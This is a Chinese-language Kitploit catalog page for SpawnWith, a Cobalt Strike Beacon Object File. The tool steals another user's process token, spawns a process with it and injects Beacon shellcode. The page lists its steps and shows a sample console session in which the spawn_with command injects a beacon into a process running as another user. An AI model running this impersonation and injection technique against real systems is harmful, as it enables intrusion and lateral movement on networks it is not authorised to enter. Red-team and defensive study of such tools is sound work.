Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SpawnWith — Cobalt Strike BOF,使用其他用户的令牌生成进程并注入 Beacon shellcode,从而通过模拟实现后渗透和横向移动。 | Kitploit
工具/GitHubGitHub/rasta-mouse/spawnwith
权限提升冒充工具横向移动后渗透利用命令与控制
GitHubrasta-mouse/spawnwith

SpawnWith

Cobalt Strike BOF,使用其他用户的令牌生成进程并注入 Beacon shellcode,从而通过模拟实现后渗透和横向移动。

查看仓库
112171年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SpawnWith

一个实验性的 Beacon 对象文件(BOF),提供了 spawnas 和 inject 命令之外的替代方案。它暴露了一个新命令 spawn_with [pid] [listener],执行以下操作:

  1. 获取目标进程的句柄。
  2. 获取进程主令牌的句柄。
  3. 将主令牌复制为模拟令牌。
  4. 获取 Beacon 的 spawnto 值。
  5. 尝试使用 CreateProcessWithTokenW 以复制的令牌生成一个新进程。
    • 如果此尝试失败,则尝试 CreateProcessAsUserW。
  6. 将 Beacon shellcode 注入生成的进程。
    • 如果是 P2P,则链接到 Beacon。

示例

root@kitploit:~
beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)

beacon> ps
22656 21972 wordpad.exe   x64   1   DESKTOP-1U6AHIU\test_user

beacon> spawnto x64 %windir%\sysnative\notepad.exe

beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:

Spawned PID 45668 and injected 297472 bytes

[+] established link to child beacon: 192.168.0.195

Beacons

下载工具